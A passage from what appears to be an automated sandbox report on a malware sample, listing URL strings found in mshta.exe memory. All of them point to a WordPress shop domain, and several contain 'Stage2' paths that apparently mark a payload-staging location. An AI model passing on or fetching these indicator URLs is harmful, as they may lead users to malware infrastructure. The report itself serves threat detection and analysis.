Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2q5r
Source: mshta.exe, 00000003.00000002.2952176599.0000017C057E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2s
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2smp
Source: mshta.exe, 00000003.00000002.2953230766.0000018407788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2vrz
Source: mshta.exe, 00000003.00000003.1823768527.00000184077B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2w
Source: mshta.exe, 00000003.00000003.1823768527.00000184077B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2~.
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/ru/optovaia-prodazha-duna/
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/shop/
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-admi
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-admin/admin-ajax.php
Source: mshta.exe, 00000003.00000002.2953889531.000001840792D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-admin/admin-ajax.phpuX
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-admin/js/password-strength-meter.min.js?ver=6.1.3
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-c?
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFU0UzdYPFkaVNA6w.woff)
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFUkUzdYPFkaVNA6w.woff)
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFV0UzdYPFkaVN.woff)
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFVUUzdYPFkaVNA6w.woff)
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWUUzdYPFkaVNA6w.woff)
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWkUzdYPFkaVNA6w.woff)
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7_Jh
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7oJ
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.7
Source: mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.000001840776B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tra
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7#
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.73.
Source: mshta.exe, 00000003.00000002.2954352575.00000184079F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7C:
Source: mshta.exe, 00000003.00000002.2953230766.0000018407710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7b
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.70
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.72
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.76
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.77-trac
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7C:
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7O
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7f
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7js=
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7onte
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7x
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2.3
Source: mshta.exe, 00000003.00000002.2953230766.000001840776B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8-pro
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8:
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8C
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8C:
Source: mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8K
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2.css
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2C:
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2y
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.21.3.
Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2C:
Source: mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2F
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2i
Source: mshta.exe, 00000003.00000002.2953230766.0000018407788000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823768527.000001840779C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2tx
Source: mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_author/js/by_author.js?ve
Source: mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.cs
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/js/by_instock.js?
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.cs
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/js/by_onsales.js?
Source: mshta.exe, 00000003.00000002.2953889531.0000018407932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/
Source: mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/css/front.css
Source: mshta.exe, 00000003.00000002.2953889531.0000018407932000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953473804.0000018407839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/img/ajax-load
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/front.js?v
Source: mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/husky.js?v
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/front_builder/css/front-buil
Source: mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.c
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/label/js/html_types/label.js
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/quick_search/css/quick_searc
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/sections/css/sections.css?ve
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/sections/js/sections.js?ver=
Source: mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/js/html_t
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/css/jquery.tabSlide
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/css/slideout.css?ve
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/js/jquery.tabSlideO
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/js/slideout.js?ver=
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/
Source: mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/front.css
Source: mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.c
